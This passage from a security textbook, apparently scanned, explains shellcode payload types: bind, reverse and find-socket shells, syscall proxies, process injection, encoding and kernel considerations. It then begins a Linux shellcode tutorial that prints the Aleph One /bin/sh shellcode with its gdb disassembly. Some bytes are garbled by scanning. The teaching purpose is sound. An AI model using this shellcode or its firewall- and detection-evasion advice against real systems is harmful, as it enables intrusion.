Unix side, using an int 0x80 requires little more than placing the proper values in spe- 
cific registers or on the stack before executing the int 0x80 instruction. At that point, the 
operating system takes over and does the rest. By comparison, the simple fact that our 
shellcode is required to call a Windows function in order to access system services com- 
plicates matters a great deal. The problem boils down to the fact that while we certainly 
know the name of the Windows function we wish to call, we do not know its location 
in memory (if indeed the required library is even loaded into memory at all!). This is a 
consequence of the fact that these functions reside in dynamic linked libraries (DLLs), 
which do not necessarily appear at the same location on all versions of Windows, and 
which can be moved to new locations for a variety of reasons, not the least of which is 
Microsoft-issued patches. As a result, Windows shellcode must go through a discovery 
process to locate each function that it needs to call before it can call those functions. 

Here again the Last Stage of Delirium has written an excellent paper entitled "Win32 
Assembly Components" covering the various ways in which this can be achieved and 
the logic behind them. Matt Miller's (aka skape) Understanding Windows's Shellcode 
picks up where the LSD paper leaves off, covering many additional topics as well. Many 
of the Metasploit payloads for Windows utilize techniques covered in Miller's paper. 

Basic Shellcode 

Given that we can inject our own code into a process, the next big question is, "What 
code do we wish to run?" Certainly, having the full power that a shell offers would be a 
nice first step. It would be nice if we did not have to write our own version of a shell (in 
assembly language, no less) just to upload it to a target computer that probably already 
has a shell installed. With that in mind, the technique that has become more or less 
standard typically involves writing assembly code that launches a new shell process on 
the target computer and causes that process to take input from and send output to the 
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attacker. The easiest piece of this puzzle to understand turns out to be launching a new 
shell process, which can be accomplished through use of the execve system call on 
Unix-like systems and via the CreateProcess function call on Microsoft Windows sys- 
tems. The more complex aspect is understanding where the new shell process receives 
its input and where it sends its output. This requires that we understand how child 
processes inherit their input and output file descriptors from their parents. 

Regardless of the operating system that we are targeting, processes are provided 
three open files when they start. These files are typically referred to as the standard in- 
put (stdin), standard output (stdout), and standard error (stderr) files. On Unix sys- 
tems, these are represented by the integer file descriptors 0, 1, and 2, respectively. 
Interactive command shells use stdin, stdout, and stderr to interact with their users. As 
an attacker, you must ensure that before you create a shell process, you have properly 
set up your input/output file descrip tor(s) to become the stdin, stdout, and stderr that 
will be utilized by the command shell once it is launched. 

Port Binding Shellcode 

When attacking a vulnerable networked application, it will not always be the case that 
simply execing a shell will yield the results we are looking for. If the remote application 
closes our network connection before our shell has been spawned, we will lose our 
means to transfer data to and from the shell. In other cases we may use UDP datagrams 
to perform our initial attack but, due to the nature of UDP sockets, we can't use them 
to communicate with a shell. In cases such as these, we need to find another means of 
accessing a shell on the target computer. One solution to this problem is to use port 
binding shellcode, often referred to as a "bind shell." Once it's running on the target, the 
steps our shellcode must take to create a bind shell on the target are as follows: 

1. Create a TCP socket. 

2. Bind the socket to an attacker-specified port. The port number is typically 
hardcoded into the shellcode. 

3. Make the socket a listening socket. 

4. Accept a new connection. 

5. Duplicate the newly accepted socket onto stdin, stdout, and stderr. 

6. Spawn a new command shell process (which will receive/send its input and 
output over the new socket). 

Step 4 requires the attacker to reconnect to the target computer in order to get at- 
tached to the command shell. To make this second connection, attackers often use a 
tool such as Netcat, which passes their keystrokes to the remote shell and receives any 
output generated by the remote shell. While this may seem like a relatively straightfor- 
ward process, there are a number of things to take into consideration when attempting 
to use port binding shellcode. First, the network environment of the target must be 
such that the initial attack is allowed to reach the vulnerable service on the target com- 
puter. Second, the target network must also allow the attacker to establish a new in- 
bound connection to the port that the shellcode has bound to. These conditions often 
exist when the target computer is not protected by a firewall, as shown in Figure 13-1. 
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Figure 13-1 

Network layout that 
permits port binding 
shellcode 




Attacker exploits vulnerable 
web server and uses port binding 
shellcode to bind a shell to port 
4444 



Connection to 
port 80 allowed 



Connection to 
port 4444 allowed 



Target running 
vulnerable web 
server on port 80 




This may not always be the case if a firewall is in use and is blocking incoming con- 
nections to unauthorized ports. As shown in Figure 13-2, a firewall may be configured 
to allow connections only to specific services such as a web or mail server, while block- 
ing connection attempts to any unauthorized ports. 

Third, a system administrator performing analysis on the target computer may won- 
der why an extra copy of the system command shell is running, why the command shell 
appears to have network sockets open, or why a new listening socket exists that can't be 
accounted for. Finally, when the shellcode is waiting for the incoming connection from 
the attacker, it generally can't distinguish one incoming connection from another, so 
the first connection to the newly opened port will be granted a shell, while subsequent 
connection attempts will fail. This leaves us with several things to consider to improve 
the behavior of our shellcode. 



Reverse Shellcode 

If a firewall can block our attempts to connect to the listening socket that results from 
successful use of port binding shellcode, perhaps we can modify our shellcode to by- 
pass this restriction. In many cases, firewalls are less restrictive regarding outgoing traf- 
fic. Reverse shellcode, also known as "callback shellcode," exploits this fact by reversing 
the direction in which the second connection is made. Instead of binding to a specific 
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Figure 13-2 Firewall configured to block port binding shellcode 
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port on the target computer, reverse shellcode initiates a new connection to a specified 
port on an attacker-controlled computer. Following a successful connection, it dupli- 
cates the newly connected socket to stdin, stdout, and stderr before spawning a new 
command shell process on the target machine. These steps are 

1. Create a TCP socket. 

2. Configure the socket to connect to an attacker-specified port and IP address. 
The port number and IP address are typically hardcoded into the attacker's 
shellcode. 

3. Connect to the specified port and IP address. 

4. Duplicate the newly connected socket onto stdin, stdout, and stderr. 

5. Spawn a new command shell process (which will receive/send its input/ 
output over the new socket). 

Figure 13-3 shows the behavior of reverse connecting shellcode. 

For a reverse shell to work, the attacker must be listening on the specified port and 
IP address prior to step 3. Netcat is often used to set up such a listener and to act as a 
terminal once the reverse connection has been established. Reverse shells are far from 
a sure thing. Depending on the firewall rules in effect for the target network, the target 
computer may not be allowed to connect to the port that we specify in our shellcode, a 
situation shown in Figure 13-4. 

It may be possible to get around restrictive rules by configuring your shellcode to 
call back to a commonly allowed outgoing port such as port 80. This may also fail, 
however, if the outbound protocol (HTTP for port 80, for example) is proxied in any 
way, as the proxy server may refuse to recognize the data that is being transferred to and 
from the shell as valid for the protocol in question. Another consideration if the at- 
tacker is located behind a NAT device is that the shellcode must be configured to con- 
nect back to a port on the NAT device. The NAT device must in turn be configured to 
forward corresponding traffic to the attacker's computer, which must be configured 
with its own listener to accept the forward connection. Finally, even though a reverse 
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Figure 1 3-3 Network layout that facilitates reverse connecting shellcode 
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Figure 13-4 Firewall configuration that prevents reverse connecting shellcode 

shell may allow us to bypass some firewall restrictions, system administrators may get 
suspicious about the fact that they have a computer establishing outbound connections 
for no apparent reason, which may lead to the discovery of our exploit. 

Find Socket Shellcode 

The last of the three common techniques for establishing a shell over a network con- 
nection involves attempting to reuse the same network connection over which the orig- 
inal attack takes place. This method takes advantage of the fact that exploiting a remote 
service necessarily involves connecting to that service, so if we are able to exploit a re- 
mote service, then we have an established connection that we can use to communicate 
with the service after the exploit is complete. This situation is shown in Figure 13-5. 

If this can be accomplished, we have the additional benefit that no new, potentially 
suspicious, network connections will be visible on the target computer, making our 
exploit at least somewhat more difficult to observe. 

The steps required to begin communicating over the existing socket involve locating 
the open file descriptor that represents our network connection on the target computer. 
Because the value of this file descriptor may not be known in advance, our shellcode 
must take action to find the open socket somehow (hence the term find socket). Once 
found, our shellcode must duplicate the socket descriptor, as discussed previously, in 
order to cause a spawned shell to communicate over that socket. The most common 
technique used in shellcode for locating the proper socket descriptor is to enumerate all 
of the possible file descriptors (usually file descriptors 0 through 255) in the vulnerable 
application, and to query each descriptor to see if it is remotely connected to our com- 
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Figure 13-5 Network conditions suited for find socket shellcode 
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puter. This is made easier by our choice of a specific outbound port to bind to when 
initiating a connection to the vulnerable service. In doing so, our shellcode can know 
exactly what port number a valid socket descriptor must be connected to, and deter- 
mining the proper socket descriptor to duplicate becomes a matter of locating the one 
socket descriptor that is connected to the port known to have been used. The steps re- 
quired by find socket shellcode include the following: 

1. For each of the 256 possible file descriptors, determine whether the descriptor 
represents a valid network connection and, if so, whether the remote port is 
one we have used. This port number is typically hardcoded into the shellcode. 

2. Once the desired socket descriptor has been located, duplicate the socket onto 
stdin, stdout, and stderr. 

3. Spawn a new command shell process (which will receive/send its input/ 
output over the original socket). 

One complication that must be taken into account is that the find socket shellcode 
must know from what port the attacker's connection has originated. In cases where the 
attacker's connection must pass through a NAT device, the attacker may not be able to 
control the outbound port that the NAT device chooses to use, which will result in the 
failure of step 1, as the attacker will not be able to encode the proper port number into 
the shellcode. 

Command Execution Code 

In some cases, it may not be possible or desirable to establish new network connections 
and carry out shell operations over what is essentially an unencrypted Telnet session. In 
such cases, all that may be required of our payload is the execution of a single com- 
mand that might be used to establish a more legitimate means of connecting to the 
target computer. Examples of such commands would be copying an SSH public key to 
the target computer in order to enable future access via an SSH connection, invoking a 
system command to add a new user account to the target computer, or modifying a 
configuration file to permit future access via a backdoor shell. Payload code that is de- 
signed to execute a single command must typically perform the following steps: 

1. Assemble the name of the command that is to be executed. 

2. Assemble any command-line arguments for the command to be executed. 

3. Invoke the execve system call in order to execute the desired command. 

Because there is no networking setup necessary, command execution code can often 
be quite small. 

File Transfer Code 

It may be the case that a target computer does not have all of the capabilities that we 
would wish to utilize once we have successfully penetrated it. If this is the case, it may 
be useful to have a payload that provides a simple file upload facility. When combined 
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with the code to execute a single command, this provides the capability to upload a 
binary to a target system and then execute that binary. File uploading code is fairly 
straightforward and involves the following steps: 

1. Open a new file. 

2. Read data from a network connection and write that data to the new file. In 
this case, the network connection would be obtained using the port binding, 
reverse connection, or find socket techniques described previously. 

3. Repeat step 2 as long as there is more data; then close the file. 

The ability to upload an arbitrary file to the target machine is roughly equivalent to 
invoking the wget command on the target in order to download a specific file. 




NOTE The wget utility is a simple command-line utility capable of 
downloading the contents of files by specifying the URL of the file to 
be downloaded. 



In fact, as long as wget happens to be present on a target system, we could use com- 
mand execution to invoke wget and accomplish essentially the same thing as a file 
upload code could accomplish. The only difference is that we would need to place the 
file to be uploaded on a web server that could be reached from the target computer. 



Multistage Shellcode 

In some cases, as a result of the nature of a vulnerability, the space available for the at- 
tacker to inject shellcode into a vulnerable application may be limited to such a degree 
that it is not possible to utilize some of the more common types of payloads. In cases 
such as these, it may be possible to use a multistage process for uploading shellcode to 
the target computer. Multistage payloads generally consist of two or more stages of 
shellcode, with the sole purpose of the first (and possibly later) stage being to read 
more shellcode and then pass control to the newly read-in second stage, which, we 
hope, contains sufficient functionality to carry out the majority of the work. 



System Call Proxy Shellcode 

Obtaining a shell as a result of an exploit may sound like an attractive idea, but it may 
also be a risky one if your goal is to remain undetected throughout your attack. Launch- 
ing new processes, creating new network connections, and creating new files are all ac- 
tions that are easily detected by security-conscious system administrators. As a result, 
payloads have been developed that do none of the above yet provide the attacker with a 
full set of capabilities for controlling a target. One such payload, called a system call proxy, 
was first publicized by Core Technologies (makers of the Core Impact tool) in 2002. 

A system call (or syscall) proxy is a small piece of shellcode that enables remote ac- 
cess to a target's core operating system functionality without the need to start a new 
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process like a command interpreter such as /bin/sh. The proxy code executes in a loop 
that accepts one request at a time from the attacker, executes that request on the target 
computer, and returns the results of the request to the attacker. All the attacker needs to 
do is package requests that specify system calls to carry out on the target, and transmit 
those requests to the system call proxy. By chaining together many requests and their 
associated results, the attacker can leverage the full power of the system call interface on 
the target computer to perform virtually any operation. Because the interface to the 
system call proxy can be well defined, it is possible to create a library to handle all of 
the communications with the proxy, making the attacker's life much easier. With a li- 
brary to handle all of the communications with the target, the attacker can write code 
in higher-level languages such as C that effectively, through the proxy, runs on the target 
computer. This is shown in Figure 13-6. 

The proxy library shown in the figure effectively replaces the standard C library (for 
C programs), redirecting any actions typically sent to the local operating system (sys- 
tem calls) to the remotely exploited computer. Conceptually, it is as if the hostile pro- 
gram were actually running on the target computer, yet no file has been uploaded to the 
target, and no new process has been created on the target, as the system call proxy pay- 
load can continue to run in the context of the exploited process. 



Process Injection Shellcode 

The final shellcode technique we will discuss in this section is that of process injection. 
Process injection shellcode allows the loading of entire libraries of code running under 
a separate thread of execution within the context of an existing process on the target 
computer. The host process may be the process that was initially exploited, leaving little 
indication that anything has changed on the target system. Alternatively, an injected 
library may be migrated to a completely different process that may be more stable than 
the exploited process, and that may offer a better place for the injected library to hide. 
In either case, the injected library may not ever be written to the hard drive on the target 
computer, making forensics examination of the target computer far more difficult. The 
Metasploit Meterpreter is an excellent example of a process injection payload. Meter- 
preter provides an attacker with a robust set of capabilities, offering nearly all of the 
same capabilities as a traditional command interpreter, while hiding within an existing 
process and leaving no disk footprint on the target computer. 



Figure 1 3-6 
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Other Shellcode Considerations 

Understanding the types of payloads that you might choose to use in any given exploit 
situation is an important first step in building reliable exploits. Given that you under- 
stand the network environment that your exploit will be operating in, there are a couple 
of other very important things that you need to understand about shellcode. 

Shellcode Encoding 

Whenever we attempt to exploit a vulnerable application, it is important that we under- 
stand any restrictions that we must adhere to when it comes to the structure of our in- 
put data. When a buffer overflow results from a strcpy operation, for example, we must 
be careful that our buffer does not inadvertently contain a null character that will pre- 
maturely terminate the strcpy operation before the target buffer has been overflowed. 

In other cases, we may not be allowed to use carriage returns or other special characters 
in our buffer. In extreme cases, our buffer may need to consist entirely of alphanumeric 
or valid Unicode characters. 

Determining exactly which characters must be avoided typically is accomplished 
through a combined process of reverse-engineering an application and observing the 
behavior of the application in a debugging environment. The "bad chars" set of charac- 
ters to be avoided must be considered when developing any shellcode, and can be pro- 
vided as a parameter to some automated shellcode encoding engines such as msfencode, 
which is part of the Metasploit Framework. Adhering to such restrictions while filling up 
a buffer generally is not too difficult until it comes to placing our shellcode into the buf- 
fer. The problem we face with shellcode is that, in addition to adhering to any input- 
formatting restrictions imposed by the vulnerable application, it must represent a valid 
machine language sequence that does something useful on the target processor. Before 
placing shellcode into a buffer, we must ensure that none of the bytes of the shellcode 
violate any input-formatting restrictions. Unfortunately, this will not always be the case. 

Fixing the problem may require access to the assembly language source for our desired 
shellcode, along with sufficient knowledge of assembly language to modify the shell- 
code to avoid any values that might lead to trouble when processed by the vulnerable 
application. Even armed with such knowledge and skill, it may be impossible to rewrite 
our shellcode, using alternative instructions, so that it avoids the use of any bad charac- 
ters. This is where the concept of shellcode encoding comes into play. 
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The purpose of a shellcode encoder is to transform the bytes of a shellcode payload 
into a new set of bytes that adheres to any restrictions imposed by our target applica- 
tion. Unfortunately, the encoded set of bytes generally is not a valid set of machine 
language instructions, in much the same sense that an encrypted text becomes unrecog- 
nizable as English language. As a consequence, our encoded payload must, somehow, 
get decoded on the target computer before it is allowed to run. The typical solution is 
to combine the encoded shellcode with a small decoding loop that first executes to 
decode our actual payload and then, once our shellcode has been decoded, transfers 
control to the newly decoded bytes. This process is shown in Figure 13-7. 

When you plan and execute your exploit to take control of the vulnerable applica- 
tion, you must remember to transfer control to the decoding loop, which will in turn 
transfer control to your actual shellcode once the decoding operation is complete. It 
should be noted that the decoder itself must also adhere to the same input restrictions 
as the remainder of our buffer. Thus, if our buffer must contain nothing but alphanu- 
meric characters, we must find a decoder loop that can be written using machine lan- 
guage bytes that also happen to be alphanumeric values. The next chapter presents 
more detailed information about the specifics of encoding and about the use of the 
Metasploit Framework to automate the encoding process. 

Self-Corrupting Shellcode 

A very important thing to understand about shellcode is that, like any other code, it 
requires storage space while executing. This storage space may simply be variable stor- 
age as in any other program, or it may be a result of placing parameter values onto the 
stack prior to calling a function. In this regard, shellcode is not much different from any 
other code, and like most other code, shellcode tends to make use of the stack for all of 
its data storage needs. Unlike other code, however, shellcode often lives in the stack it- 
self, creating a tricky situation in which shellcode, by virtue of writing data into the 
stack, may inadvertently overwrite itself, resulting in corruption of the shellcode. Figure 
13-8 shows a generalized memory layout that exists at the moment that a stack over- 
flow is triggered. 

At this point, a corrupted return address has just been popped off of the stack, leaving 
the extended stack pointer, esp, pointing at the first byte in region B. Depending on the 
nature of the vulnerability, we may have been able to place shellcode into region A, re- 
gion B, or perhaps both. It should be clear that any data that our shellcode pushes onto 
the stack will soon begin to overwrite the contents of region A. If this happens to be where 
our shellcode is, we may well run into a situation where our shellcode gets overwritten 
and ultimately crashes, most likely due to an invalid instruction being fetched from the 
overwritten memory area. Potential corruption is not limited to region A. The area that 
may be corrupted depends entirely on how the shellcode has been written and the types 
of memory references that it makes. If the shellcode instead references data below the 
stack pointer, it is easily possible to overwrite shellcode located in region B. 



Figure 1 3-7 
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Figure 1 3-8 
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How do you know if your shellcode has the potential to overwrite itself, and what 
steps can you take to avoid this situation? The answer to the first part of this question 
depends entirely on how you obtain your shellcode and what level of understanding 
you have regarding its behavior. Looking at the Alephl shellcode used in Chapters 11 
and 12, can you deduce its behavior? All too often we obtain shellcode as nothing more 
than a blob of data that we paste into an exploit program as part of a larger buffer. We 
may in fact use the same shellcode in the development of many successful exploits be- 
fore it inexplicably fails to work as expected one day, causing us to spend many hours 
in a debugger before realizing that the shellcode was overwriting itself as described 
earlier. This is particularly true when we become too reliant on automated shellcode- 
generation tools, which often fail to provide a corresponding assembly language listing 
when spitting out a newly minted payload for us. What are the possible solutions to 
this type of problem? 

The first solution is simply to try to shift the location of your shellcode so that any 
data written to the stack does not happen to hit your shellcode. Referring back to Figure 
13-8, if the shellcode were located in region A and were getting corrupted as a result of 
stack growth, one possible solution would be to move the shellcode higher in region A, 
further away from esp, and to hope that the stack would not grow enough to hit it. If 
there were not sufficient space to move the shellcode within region A, then it might be 
possible to relocate the shellcode to region B and avoid stack growth issues altogether. 

Similarly, shellcode located in region B that is getting corrupted could be moved even 
deeper into region B, or potentially relocated to region A. In some cases, it might not be 
possible to position your shellcode in such a way that it would avoid this type of cor- 
ruption. This leads us to the most general solution to the problem, which is to adjust 
esp so that it points to a location clear of our shellcode. This is easily accomplished by 
inserting an instruction to add or subtract a constant value to esp that is of sufficient 
size to keep esp clear of our shellcode. This instruction must generally be added as the 
first instruction in our payload, prior to any decoder if one is present. 

Disassembling Shellcode 

Until you are ready and willing to write your own shellcode using assembly language 
tools, you will likely rely on published shellcode payloads or automated shellcode- 
generation tools. In either case, you will generally find yourself without an assembly 
language listing to tell you exactly what the shellcode does. Alternatively, you may sim- 
ply see a piece of code published as a blob of hex bytes and wonder whether it does 
what it claims to do. Some security-related mailing lists routinely see posted shellcode 
claiming to perform something useful, when in fact it performs some malicious action. 

Regardless of your reason for wanting to disassemble a piece of shellcode, it is a rela- 
tively easy process requiring only a compiler and a debugger. Borrowing the Alephl 
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shellcode used in Chapters 11 and 12, we create the simple program that follows as 
shellcode.c: 



char shellcode[] = 

/* the Aleph One shellcode */ 

"\x31\xc0\x31\xdb\xb0\xl7\xcd\x80" 

"\xeb\xlf \x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 

" \x80\xe8\xdc\xf f \xf f \xf f /bin/sh" ; 
int main ( ) { } 

Compiling this code will cause the shellcode hex blob to be encoded as binary, 
which we can observe in a debugger, as shown here: 

# gcc -o shellcode shellcode.c 

# gdb shellcode 

(gdb) x /24i &shellcode 



0x8049540 


<shellcode>: xor 


eax, 


eax 


0x8049542 


<shellcode+2> : 


xor 


ebx, ebx 


0x8049544 


<shellcode+4> : 


mov 


al, 0x17 


0x8049546 


<shellcode+6> : 


int 


0x80 


0x8049548 


<shellcode+8> : 


jmp 


0x8049569 <shellcode+4 1> 


0x804954a 


<shellcode+10> : 


pop 


esi 


0x804954b 


<shellcode+ll> : 


mov 


DWORD PTR [esi+8 ] , esi 


0x804954e 


<shellcode+14> : 


xor 


eax, eax 


0x8049550 


<shellcode+l 6> : 


mov 


BYTE PTR [esi+7 ] , al 


0x8049553 


<shellcode+l 9> : 


mov 


DWORD PTR [esi+12 ] , eax 


0x8049556 


<shellcode+22> : 


mov 


al, Oxb 


0x8049558 


<shellcode+24> : 


mov 


ebx, esi 


0x804955a 


<shellcode+2 6> : 


lea 


ecx, [esi+8] 


0x804955d 


<shellcode+2 9> : 


lea 


edx, [esi+12 ] 


0x8049560 


<shellcode+32> : 


int 


0x80 


0x8049562 


<shellcode+34> : 


xor 


ebx, ebx 


0x8049564 


<shellcode+36> : 


mov 


eax, ebx 


0x8049566 


<shellcode+38> : 


inc 


eax 


0x8049567 


<shellcode+39> : 


int 


0x80 


0x8049569 


<shellcode+41> : 


call 


0x804954a <shellcode+10> 


0x804956e 


<shellcode+4 6> : 


das 




0x804956f 


<shellcode+47> : 


bound ebp, DWORD PTR [ecx+110] 


0x8049572 


<shellcode+50> : 


das 




0x8049573 


<shellcode+51> : 


jae 


0x80495dd 



(gdb) x /s 0x804956e 

0x804956e <shellcode+4 6> : "/bin/sh" 
(gdb) quit 
# 



Note that we can't use the gdb disassemble command, because the shellcode array 
lies in the data section of the program rather than the code section. Instead, gdb's exam- 
ine facility is used to dump memory contents as assembly language instructions. Further 
study of the code can then be performed to understand exactly what it actually does. 



Kernel Space Shellcode 

User space programs are not the only type of code that contains vulnerabilities. Vulner- 
abilities are also present in operating system kernels and their components, such as 
device drivers. The fact that these vulnerabilities are present within the relatively 
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protected environment of the kernel does not make them immune from exploitation. 

It has been primarily due to the lack of information on how to create shellcode to run 
within the kernel that working exploits for kernel-level vulnerabilities have been rela- 
tively scarce. This is particularly true regarding the Windows kernel; little documenta- 
tion on the inner workings of the Windows kernel exists outside of the Microsoft cam- 
pus. Recently, however, there has been an increasing amount of interest in kernel-level 
exploits as a means of gaining complete control of a computer in a nearly undetectable 
manner. This increased interest is due in large part to the fact that the information re- 
quired to develop kernel-level shellcode is slowly becoming public. Papers published 
by eEye Digital Security and the Uninformed Journal have shed a tremendous amount of 
light on the subject, with the result that the latest version of the Metasploit Framework 
(version 3.3 as of this writing) contains kernel-level exploits and payloads. 

Kernel Space Considerations 

A couple of things make exploitation of the kernel a bit more adventurous than exploi- 
tation of user space programs. The first thing to understand is that while an exploit 
gone awry in a vulnerable user space application may cause the vulnerable application 
to crash, it is not likely to cause the entire operating system to crash. On the other hand, 
an exploit that fails against a kernel is likely to crash the kernel, and therefore the entire 
computer. In the Windows world, "blue screens" are a simple fact of life while develop- 
ing exploits at the kernel level. 

The next thing to consider is what you intend to do once you have code running 
within the kernel. Unlike with user space, you certainly can't do an execve system call 
and replace the current process (the kernel in this case) with a process more to your 
liking. Also unlike with user space, you will not have access to a large catalog of shared 
libraries from which to choose functions that are useful to you. The notion of a system 
call ceases to exist in kernel space, as code running in kernel space is already in "the 
system." The only functions that you will have access to initially will be those exported 
by the kernel. The interface to those functions may or may not be published, depending 
on the operating system that you are dealing with. An excellent source of information 
on the Windows kernel programming interface is Gary Nebbett's book Windows 
NT/2000 Native API Reference. Once you are familiar with the native Windows API, you 
will still be faced with the problem of locating all of the functions that you wish to 
make use of. In the case of the Windows kernel, techniques similar to those used for 
locating functions in user space can be employed, as the Windows kernel (ntoskrnl.exe) 
is itself a Portable Executable (PE) file. 

Stability becomes a huge concern when developing kernel-level exploits. As men- 
tioned previously, one wrong move in the kernel can bring down the entire system. Any 
shellcode you use needs to take into account the effect your exploit will have on the 
thread that you exploited. If the thread crashes or becomes unresponsive, the entire 
system may soon follow. Proper cleanup is a very important piece of any kernel exploit. 

Another factor that will influence the stability of the system is the state of any interrupt 
processing being conducted by the kernel at the time of the exploit. Interrupts may 
need to be re-enabled or reset cleanly in order to allow the system to continue stable 
operation. 
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Ultimately, you may decide that the somewhat more forgiving environment of user 
space is a more desirable place to run code. This is exactly what many recent kernel 
exploits do. By scanning the process list, a process with sufficiently high privileges can 
be selected as a host for a new thread that will contain attacker-supplied code. Kernel 
API functions can then be utilized to initialize and launch the new thread, which runs 
in the context of the selected process. 

While the lower-level details of kernel-level exploits are beyond the scope of this 
book, the fact that this is a rapidly evolving area is likely to make kernel exploitation 
tools and techniques more and more accessible to the average security researcher. In the 
meantime, the references listed next will serve as excellent starting points for those in- 
terested in more detailed coverage of the topic. 

References 

"Remote Windows Kernel Exploitation (Barnaby Jack) research.eeye.com/html/ 
Papers/download/StepIntoTheRing.pdf 

"Windows Kernel-mode Payload Fundamentals" (bugcheck and skape) 
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Windoivs NT/2000 Native API Reference (Gary Nebbett) Sams Publishing, 2000 
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CHAPTER 



Writing Linux Shellcode 



In the previous chapters, we used Alephl's ubiquitous shellcode. In this chapter, we 
will learn to write our own. Although the previously shown shellcode works well in 
the examples, the exercise of creating your own is worthwhile because there will be 
many situations where the standard shellcode does not work and you will need to 
create your own. 

In this chapter, we cover various aspects of Linux shellcode: 

• Basic Linux shellcode 

• Implementing port-binding shellcode 

• Implementing reverse connecting shellcode 

• Encoding shellcode 

• Automating shellcode generation with Metasploit 

Basic Linux Shellcode 

The term "shellcode" refers to self-contained binary code that completes a task. The 
task may range from issuing a system command to providing a shell back to the 
attacker, as was the original purpose of shellcode. 

There are basically three ways to write shellcode: 

• Directly write the hex opcodes. 

• Write a program in a high-level language like C, compile it, and then 
disassemble it to obtain the assembly instructions and hex opcodes. 

• Write an assembly program, assemble the program, and then extract the hex 
opcodes from the binary. 

Writing the hex opcodes directly is a little extreme. You will start by learning the C 
approach, but quickly move to writing assembly, then to extraction of the opcodes. In 
any event, you will need to understand low-level (kernel) functions such as read, write, 
and execute. Since these system functions are performed at the kernel level, you will 
need to learn a little about how user processes communicate with the kernel. 
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System Calls 

The purpose of the operating system is to serve as a bridge between the user (process) 
and the hardware. There are basically three ways to communicate with the operating 
system kernel: 

• Hardware interrupts For example, an asynchronous signal from the 
keyboard 

• Hardware traps For example, the result of an illegal "divide by zero" error 

• Software traps For example, the request for a process to be scheduled for 
execution 

Software traps are the most useful to ethical hackers because they provide a method 
for the user process to communicate to the kernel. The kernel abstracts some basic 
system-level functions from the user and provides an interface through a system call. 

Definitions for system calls can be found on a Linux system in the following file: 

$cat /usr/include/asm/unistd. h 
#ifndef _ASM_I38 6_UNISTD_H_ 

#def ine _ASM_I38 6_UNISTD_H_ 

#define NR_exit 1 

. . . snip . . . 

# define NR_execve 11 

. . . snip . . . 

#define NR_setreuid 70 

. . . snip . . . 

# define NR_dup2 99 

. . . snip . . . 

#define NR_socketcall 102 

. . . snip . . . 

#define NR_exit_group 252 

. . . snip . . . 

In the next section, we will begin the process, starting with C. 

System Calls by C 

At a C level, the programmer simply uses the system call interface by referring to the 
function signature and supplying the proper number of parameters. The simplest way 
to find out the function signature is to look up the function's man page. 

For example, to learn more about the execve system call, you would type 

$man 2 execve 

This would display the following man page: 

EXECVE (2) Linux Programmer's Manual EXECVE (2) 

NAME 

execve - execute program 
SYNOPSIS 

#include <unistd.h> 

int execve (const char ^filename, char *const argv [], char 
* const envp [ ] ) ; 

DESCRIPTION 

execve () executes the program pointed to by filename. Filename 
must be either a binary executable, or a script starting with a line of the 
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form "#! interpreter [arg]". In the latter case, the interpreter must be a 
valid pathname for an executable which is not itself a script, which will 
be invoked as interpreter [arg] filename. 

argv is an array of argument strings passed to the new program, 
envp is an array of strings, conventionally of the form key=value, which 
are passed as environment to the new program. Both, argv and envp must 
be terminated by a NULL pointer. The argument vector and envi-execve ( ) 
does not return on success, and the text, data, bss, and stack of the 
calling process are overwritten by that of the program loaded. The 
program invoked inherits the calling process's PID, and any open file 
descriptors that are not set to close on exec. Signals pending on the 
calling process are cleared. Any signals set to be caught by the calling 
process are reset to their default behaviour. 

. . . snipped. . . 

As the next section shows, the previous system call can be implemented directly 
with assembly. 

System Calls by Assembly 

At an assembly level, the following registries are loaded to make a system call: 

• eax Used to load the hex value of the system call (see unistd.h earlier) 

• ebx Used for the first parameter — ecx is used for second parameter, edx for 
the third, esi for the fourth, and edi for the fifth 

If more than five parameters are required, an array of the parameters must be stored 
in memory and the address of that array must be stored in ebx. 

Once the registers are loaded, an int 0x80 assembly instruction is called to issue a 
software interrupt, forcing the kernel to stop what it is doing and handle the interrupt. 
The kernel first checks the parameters for correctness, then copies the register values to 
kernel memory space and handles the interrupt by referring to the Interrupt Descriptor 
Table (IDT). 

The easiest way to understand this is to see an example, as given in the next section. 



Exit System Call 

The first system call we will focus on executes exit(0). The signature of the exit system 
call is as follows: 

• eax 0x01 (from the unistd.h file earlier) 

• ebx User-provided parameter (in this case 0) 

Since this is our first attempt at writing system calls, we will start with C. 

Starting with C 

The following code will execute the function exit(0) : 

$ cat exit.c 
#include <stdlib.h> 
main ( ) { 
exit (0) ; 

} 
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Go ahead and compile the program. Use the -static flag to compile in the library 
call to exit as well. 

$ gcc -static -o exit exit.c 




NOTE If you receive the following error, you do not have the glibc-static- 
devel package installed on your system: 

/usr/bin/ld: cannot find -lc 

You can either install that rpm package or try to remove the -static flag. 
Many recent compilers will link in the exit call without the -static flag. 



Now launch gdb in quiet mode (skip banner) with the -q flag. Start by setting a 
breakpoint at the main function; then run the program with r. Finally, disassemble the 
_exit function call with disass _exit. 



$ gdb exit -q 
(gdb) b main 

Breakpoint 1 at 0x80481d6 
(gdb) r 

Starting program: /root/book/chaptl4/exit 
Breakpoint 1, 0x080481d6 in main () 

(gdb) disass _exit 



Dump of assembler code 


for function exit 


0x804c56c 


< 


exit> : 


mov 


0x4 (%esp, 1 


0x804c570 


< 


exit+4> : 


mov 


$0xf c, %eax 


0x804c575 


< 


exit+9> : 


int 


$0x80 


0x804c577 


< 


exit+ll> : 


mov 


$0x1 , %eax 


0x804c57c 


< 


exit+1 6> : 


int 


$0x80 


0x804c57e 


< 


exit+18> : 


hit 




0x804c57f 


< 


exit+1 9> : 


nop 





End of assembler dump, 
(gdb) q 



You can see that the function starts by loading our user argument into ebx (in our 
case, 0). Next, line _exit+ll loads the value Oxl into eax; then the interrupt (int $0x80) 
is called at line _exit+16. Notice that the compiler added a complimentary call to exit_ 
group (Oxfc or syscall 252). The exit_group() call appears to be included to ensure that 
the process leaves its containing thread group, but there is no documentation to be 
found online. This was done by the wonderful people who packaged libc for this par- 
ticular distribution of Linux. In this case, that may have been appropriate — we cannot 
have extra function calls introduced by the compiler for our shellcode. This is the rea- 
son that you will need to learn to write your shellcode in assembly directly. 



Move to Assembly 

By looking at the preceding assembly, you will notice that there is no black magic here. 
In fact, you could rewrite the exit(O) function call by simply using the assembly: 

Scat exit. asm 

section .text ; start code section of assembly 
global _start 
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_start : 
xor eax, eax 
xor ebx, ebx 
